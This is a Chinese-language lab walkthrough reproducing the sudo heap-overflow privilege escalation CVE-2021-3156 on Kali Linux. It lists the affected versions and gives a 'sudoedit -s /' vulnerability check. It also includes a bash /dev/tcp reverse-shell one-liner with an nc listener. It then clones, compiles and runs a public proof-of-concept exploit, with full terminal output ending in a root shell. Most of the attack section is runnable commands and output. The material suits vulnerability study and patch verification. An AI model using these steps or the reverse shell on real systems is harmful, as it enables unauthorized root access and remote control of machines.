影响范围
Sudo 1.8.2 - 1.8.31p2
Sudo 1.9.0 - 1.9.5p1
环境准备
这里使用的是kali2020.2
查看sudo版本
sudo --version
执行
sudoedit -s /
如果返回
root@kali:~# sudoedit -s /
sudoedit: /:不是常规文件 #sudoedit: /: not a regular file
root@kali:~#
则存在漏洞
返回
usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file
则不存在漏洞
添加用户
useradd test
passwd test
#设置用户密码
service ssh start#启动ssh
连接
ssh test@192.168.xx.xx
由于kali存在git,所以就直接使用git下载exp,否则需要使用webshell或者自行下载解压
或者直接在shell中反弹shell
bash -i >& /dev/tcp/192.168.x.x/996 0>&1 #端口号咋就这样了
接收shell
nc -lvvp 996
漏洞复现
cd /tmp
git clone https://github.com/blasty/CVE-2021-3156.git
make
chmod +x sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1
操作过程
$ cd /tmp
$ pwd
/tmp
$ git clone https://github.com/blasty/CVE-2021-3156.git
正克隆到 'CVE-2021-3156'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (50/50), done.
remote: Compressing objects: 100% (35/35), done.
remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0
接收对象中: 100% (50/50), 8.98 KiB | 836.00 KiB/s, 完成.
处理 delta 中: 100% (25/25), 完成.
$ cd CVE-2021-3156
$ pwd
/tmp/CVE-2021-3156
$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
usage: ./sudo-hax-me-a-sandwich <target>
available targets:
------------------------------------------------------------
0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27
1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28
------------------------------------------------------------
manual mode:
./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
$ ./sudo-hax-me-a-sandwich 1
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
# ls
Makefile README.md brute.sh hax.c lib.c libnss_X sudo-hax-me-a-sandwich
# exit
参考文章
https://www.anquanke.com/post/id/231408